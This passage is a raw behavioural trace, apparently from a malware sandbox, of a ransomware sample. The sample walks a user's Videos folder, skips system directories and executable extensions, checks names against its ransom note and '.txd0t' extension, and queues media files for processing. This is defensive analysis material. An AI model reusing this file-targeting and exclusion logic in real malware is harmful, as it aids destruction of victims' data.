(psz1="42OnoQ2VRBixgPOTlYl.avi", psz2="thumbs.db") returned -1 [0076.410] StrCmpIW (psz1="42OnoQ2VRBixgPOTlYl.avi", psz2=" ransomware ") returned 1 [0076.410] StrCmpIW (psz1="42OnoQ2VRBixgPOTlYl.avi", psz2=" ransom ") returned 1 [0076.410] StrCmpIW (psz1="42OnoQ2VRBixgPOTlYl.avi", psz2="debug.txt") returned -1 [0076.410] StrCmpIW (psz1="42OnoQ2VRBixgPOTlYl.avi", psz2="boot.ini") returned -1 [0076.410] StrCmpIW (psz1="42OnoQ2VRBixgPOTlYl.avi", psz2="desktop.ini") returned -1 [0076.410] StrCmpIW (psz1="42OnoQ2VRBixgPOTlYl.avi", psz2="autorun.inf") returned -1 [0076.410] StrCmpIW (psz1="42OnoQ2VRBixgPOTlYl.avi", psz2="ntuser.dat") returned -1 [0076.410] StrCmpIW (psz1="42OnoQ2VRBixgPOTlYl.avi", psz2="ntldr") returned -1 [0076.410] StrCmpIW (psz1="42OnoQ2VRBixgPOTlYl.avi", psz2="ntdetect.com") returned -1 [0076.410] StrCmpIW (psz1="42OnoQ2VRBixgPOTlYl.avi", psz2="bootfont.bin") returned -1 [0076.411] StrCmpIW (psz1="42OnoQ2VRBixgPOTlYl.avi", psz2="!TXDOT_READ_ME!.txt") returned 1 [0076.411] PathFindExtensionW (pszPath="42OnoQ2VRBixgPOTlYl.avi") returned=".avi" [0076.411] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".avi") returned 0x0 [0076.411] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0076.411] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0076.411] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0076.411] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0076.411] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Videos\\42OnoQ2VRBixgPOTlYl.avi", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\42OnoQ2VRBixgPOTlYl.avi") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\42OnoQ2VRBixgPOTlYl.avi" [0076.411] SetEvent (hEvent=0x3fc) returned 1 [0076.419] FindNextFileW (in: hFindFile=0xec22f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x43f94523, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x43f94523, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce317778, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0076.426] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0076.426] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0076.426] FindNextFileW (in: hFindFile=0xec22f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0f2440, ftCreationTime.dwHighDateTime=0x1d5e778, ftLastAccessTime.dwLowDateTime=0x64f62e60, ftLastAccessTime.dwHighDateTime=0x1d5e3ec, ftLastWriteTime.dwLowDateTime=0x64f62e60, ftLastWriteTime.dwHighDateTime=0x1d5e3ec, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="E10w7BI-yN9p", cAlternateFileName="E10W7B~1")) returned 1 [0076.426] StrCmpW (psz1="E10w7BI-yN9p", psz2=".") returned 1 [0076.426] StrCmpW (psz1="E10w7BI-yN9p", psz2="..") returned 1 [0076.426] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Videos", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos") returned="C:\\Users\\FD1HVy\\Videos" [0076.426] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos", psz2="\\", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\") returned="C:\\Users\\FD1HVy\\Videos\\" [0076.426] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\", psz2="E10w7BI-yN9p", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p" [0076.426] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch="\\windows\\system32\\") returned 0x0 [0076.426] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch="\\windows\\syswow64\\") returned 0x0 [0076.426] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch="\\windows\\system\\") returned 0x0 [0076.426] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch="\\windows\\winsxs\\") returned 0x0 [0076.427] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch="\\appdata\\roaming\\") returned 0x0 [0076.427] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch="\\appdata\\local\\") returned 0x0 [0076.427] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch="\\appdata\\locallow\\") returned 0x0 [0076.427] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch="\\all users\\microsoft\\") returned 0x0 [0076.427] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch="\\inetpub\\logs\\") returned 0x0 [0076.427] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch=":\\boot\\") returned 0x0 [0076.427] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch=":\\perflogs\\") returned 0x0 [0076.427] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch=":\\programdata\\") returned 0x0 [0076.427] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch=":\\drivers\\") returned 0x0 [0076.427] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch=":\\wsus\\") returned 0x0 [0076.427] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch=":\\efstmpwp\\") returned 0x0 [0076.427] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch=":\\$recycle.bin\\") returned 0x0 [0076.427] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch="crypt_detect") returned 0x0 [0076.427] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch="cryptolocker") returned 0x0 [0076.427] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch="ransomware") returned 0x0 [0076.427] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch="C:\\WINDOWS") returned 0x0 [0076.427] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch="C:\\Program Files (x86)") returned 0x0 [0076.427] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", lpSrch="C:\\Program Files") returned 0x0 [0076.427] GetProcessHeap () returned 0xe30000 [0076.427] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4c8) returned 0xed31f0 [0076.427] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", cchMax=1096 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p" [0076.427] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", psz2="\\*", cchMax=1096 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\*") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\*" [0076.427] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\*", lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0f2440, ftCreationTime.dwHighDateTime=0x1d5e778, ftLastAccessTime.dwLowDateTime=0x64f62e60, ftLastAccessTime.dwHighDateTime=0x1d5e3ec, ftLastWriteTime.dwLowDateTime=0x64f62e60, ftLastWriteTime.dwHighDateTime=0x1d5e3ec, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2730 [0076.427] StrCmpW (psz1=".", psz2=".") returned 0 [0076.427] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0f2440, ftCreationTime.dwHighDateTime=0x1d5e778, ftLastAccessTime.dwLowDateTime=0x64f62e60, ftLastAccessTime.dwHighDateTime=0x1d5e3ec, ftLastWriteTime.dwLowDateTime=0x64f62e60, ftLastWriteTime.dwHighDateTime=0x1d5e3ec, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.427] StrCmpW (psz1="..", psz2=".") returned 1 [0076.427] StrCmpW (psz1="..", psz2="..") returned 0 [0076.428] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68cd7160, ftCreationTime.dwHighDateTime=0x1d5ed3d, ftLastAccessTime.dwLowDateTime=0x3b1202a0, ftLastAccessTime.dwHighDateTime=0x1d5ea35, ftLastWriteTime.dwLowDateTime=0x3b1202a0, ftLastWriteTime.dwHighDateTime=0x1d5ea35, nFileSizeHigh=0x0, nFileSizeLow=0x833f, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="cDQNx.mp4", cAlternateFileName="")) returned 1 [0076.428] StrCmpW (psz1="cDQNx.mp4", psz2=".") returned 1 [0076.428] StrCmpW (psz1="cDQNx.mp4", psz2="..") returned 1 [0076.428] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", cchMax=1096 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p" [0076.428] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", psz2="\\", cchMax=1096 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\" [0076.428] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\", psz2="cDQNx.mp4", cchMax=1096 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\cDQNx.mp4") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\cDQNx.mp4" [0076.428] PathFindExtensionW (pszPath="cDQNx.mp4") returned=".mp4" [0076.428] StrCmpW (psz1=".mp4", psz2=".txd0t") returned -1 [0076.428] StrCmpIW (psz1="cDQNx.mp4", psz2="bootsect.bak") returned 1 [0076.428] StrCmpIW (psz1="cDQNx.mp4", psz2="iconcache.db") returned -1 [0076.428] StrCmpIW (psz1="cDQNx.mp4", psz2="thumbs.db") returned -1 [0076.428] StrCmpIW (psz1="cDQNx.mp4", psz2=" ransomware ") returned 1 [0076.428] StrCmpIW (psz1="cDQNx.mp4", psz2=" ransom ") returned 1 [0076.428] StrCmpIW (psz1="cDQNx.mp4", psz2="debug.txt") returned -1 [0076.428] StrCmpIW (psz1="cDQNx.mp4", psz2="boot.ini") returned 1 [0076.428] StrCmpIW (psz1="cDQNx.mp4", psz2="desktop.ini") returned -1 [0076.428] StrCmpIW (psz1="cDQNx.mp4", psz2="autorun.inf") returned 1 [0076.428] StrCmpIW (psz1="cDQNx.mp4", psz2="ntuser.dat") returned -1 [0076.428] StrCmpIW (psz1="cDQNx.mp4", psz2="ntldr") returned -1 [0076.428] StrCmpIW (psz1="cDQNx.mp4", psz2="ntdetect.com") returned -1 [0076.428] StrCmpIW (psz1="cDQNx.mp4", psz2="bootfont.bin") returned 1 [0076.428] StrCmpIW (psz1="cDQNx.mp4", psz2="!TXDOT_READ_ME!.txt") returned 1 [0076.428] PathFindExtensionW (pszPath="cDQNx.mp4") returned=".mp4" [0076.428] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".mp4") returned 0x0 [0076.428] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0076.428] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0076.428] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0076.428] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0076.428] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\cDQNx.mp4", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\cDQNx.mp4") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\cDQNx.mp4" [0076.428] SetEvent (hEvent=0x3fc) returned 1 [0076.433] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8ac050, ftCreationTime.dwHighDateTime=0x1d5e818, ftLastAccessTime.dwLowDateTime=0xe61c1560, ftLastAccessTime.dwHighDateTime=0x1d5e714, ftLastWriteTime.dwLowDateTime=0xe61c1560, ftLastWriteTime.dwHighDateTime=0x1d5e714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="YD6Z6S-cuGg", cAlternateFileName="YD6Z6S~1")) returned 1 [0076.433] StrCmpW (psz1="YD6Z6S-cuGg", psz2=".") returned 1 [0076.434] StrCmpW (psz1="YD6Z6S-cuGg", psz2="..") returned 1 [0076.434] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", cchMax=1096 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p" [0076.434] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p", psz2="\\", cchMax=1096 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\" [0076.438] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\", psz2="YD6Z6S-cuGg", cchMax=1096 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg" [0076.439] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch="\\windows\\system32\\") returned 0x0 [0076.439] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch="\\windows\\syswow64\\") returned 0x0 [0076.439] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch="\\windows\\system\\") returned 0x0 [0076.439] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch="\\windows\\winsxs\\") returned 0x0 [0076.439] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch="\\appdata\\roaming\\") returned 0x0 [0076.439] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch="\\appdata\\local\\") returned 0x0 [0076.439] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch="\\appdata\\locallow\\") returned 0x0 [0076.439] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch="\\all users\\microsoft\\") returned 0x0 [0076.439] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch="\\inetpub\\logs\\") returned 0x0 [0076.439] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch=":\\boot\\") returned 0x0 [0076.439] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch=":\\perflogs\\") returned 0x0 [0076.440] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch=":\\programdata\\") returned 0x0 [0076.440] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch=":\\drivers\\") returned 0x0 [0076.440] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch=":\\wsus\\") returned 0x0 [0076.446] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch=":\\efstmpwp\\") returned 0x0 [0076.446] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch=":\\$recycle.bin\\") returned 0x0 [0076.446] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch="crypt_detect") returned 0x0 [0076.446] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch="cryptolocker") returned 0x0 [0076.447] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch="ransomware") returned 0x0 [0076.447] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch="C:\\WINDOWS") returned 0x0 [0076.447] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch="C:\\Program Files (x86)") returned 0x0 [0076.447] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", lpSrch="C:\\Program Files") returned 0x0 [0076.447] GetProcessHeap () returned 0xe30000 [0076.447] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4e0) returned 0xed56d0 [0076.447] StrCpyNW (in: psz1=0xed56d0, psz2="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg" [0076.447] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", psz2="\\*", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\*") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\*" [0076.447] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\*", lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8ac050, ftCreationTime.dwHighDateTime=0x1d5e818, ftLastAccessTime.dwLowDateTime=0xe61c1560, ftLastAccessTime.dwHighDateTime=0x1d5e714, ftLastWriteTime.dwLowDateTime=0xe61c1560, ftLastWriteTime.dwHighDateTime=0x1d5e714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2130 [0076.447] StrCmpW (psz1=".", psz2=".") returned 0 [0076.447] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8ac050, ftCreationTime.dwHighDateTime=0x1d5e818, ftLastAccessTime.dwLowDateTime=0xe61c1560, ftLastAccessTime.dwHighDateTime=0x1d5e714, ftLastWriteTime.dwLowDateTime=0xe61c1560, ftLastWriteTime.dwHighDateTime=0x1d5e714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.447] StrCmpW (psz1="..", psz2=".") returned 1 [0076.447] StrCmpW (psz1="..", psz2="..") returned 0 [0076.447] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1444bf50, ftCreationTime.dwHighDateTime=0x1d5eec7, ftLastAccessTime.dwLowDateTime=0x93065290, ftLastAccessTime.dwHighDateTime=0x1d5ec33, ftLastWriteTime.dwLowDateTime=0x93065290, ftLastWriteTime.dwHighDateTime=0x1d5ec33, nFileSizeHigh=0x0, nFileSizeLow=0x30d4, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="6HAlI.avi", cAlternateFileName="")) returned 1 [0076.447] StrCmpW (psz1="6HAlI.avi", psz2=".") returned 1 [0076.447] StrCmpW (psz1="6HAlI.avi", psz2="..") returned 1 [0076.447] StrCpyNW (in: psz1=0xed56d0, psz2="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg" [0076.447] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", psz2="\\", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\" [0076.447] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\", psz2="6HAlI.avi", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\6HAlI.avi") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\6HAlI.avi" [0076.447] PathFindExtensionW (pszPath="6HAlI.avi") returned=".avi" [0076.447] StrCmpW (psz1=".avi", psz2=".txd0t") returned -1 [0076.447] StrCmpIW (psz1="6HAlI.avi", psz2="bootsect.bak") returned -1 [0076.447] StrCmpIW (psz1="6HAlI.avi", psz2="iconcache.db") returned -1 [0076.447] StrCmpIW (psz1="6HAlI.avi", psz2="thumbs.db") returned -1 [0076.447] StrCmpIW (psz1="6HAlI.avi", psz2=" ransomware ") returned 1 [0076.447] StrCmpIW (psz1="6HAlI.avi", psz2=" ransom ") returned 1 [0076.447] StrCmpIW (psz1="6HAlI.avi", psz2="debug.txt") returned -1 [0076.447] StrCmpIW (psz1="6HAlI.avi", psz2="boot.ini") returned -1 [0076.448] StrCmpIW (psz1="6HAlI.avi", psz2="desktop.ini") returned -1 [0076.448] StrCmpIW (psz1="6HAlI.avi", psz2="autorun.inf") returned -1 [0076.448] StrCmpIW (psz1="6HAlI.avi", psz2="ntuser.dat") returned -1 [0076.448] StrCmpIW (psz1="6HAlI.avi", psz2="ntldr") returned -1 [0076.448] StrCmpIW (psz1="6HAlI.avi", psz2="ntdetect.com") returned -1 [0076.448] StrCmpIW (psz1="6HAlI.avi", psz2="bootfont.bin") returned -1 [0076.448] StrCmpIW (psz1="6HAlI.avi", psz2="!TXDOT_READ_ME!.txt") returned 1 [0076.448] PathFindExtensionW (pszPath="6HAlI.avi") returned=".avi" [0076.448] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".avi") returned 0x0 [0076.448] FileTimeToSystemTime (in: lpFileTime=0x552eeec, lpSystemTime=0x552eed8 | out: lpSystemTime=0x552eed8) returned 1 [0076.448] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552eed8, lpLocalTime=0x552eea8 | out: lpLocalTime=0x552eea8) returned 1 [0076.448] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0076.448] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0076.448] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\6HAlI.avi", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\6HAlI.avi") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\6HAlI.avi" [0076.448] SetEvent (hEvent=0x3fc) returned 1 [0076.450] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd78b7cd0, ftCreationTime.dwHighDateTime=0x1d5e7fe, ftLastAccessTime.dwLowDateTime=0xa87fd220, ftLastAccessTime.dwHighDateTime=0x1d5e40b, ftLastWriteTime.dwLowDateTime=0xa87fd220, ftLastWriteTime.dwHighDateTime=0x1d5e40b, nFileSizeHigh=0x0, nFileSizeLow=0x18589, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="8aR-oZ.mp4", cAlternateFileName="")) returned 1 [0076.451] StrCmpW (psz1="8aR-oZ.mp4", psz2=".") returned 1 [0076.456] StrCmpW (psz1="8aR-oZ.mp4", psz2="..") returned 1 [0076.459] StrCpyNW (in: psz1=0xed56d0, psz2="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg" [0076.459] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", psz2="\\", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\") 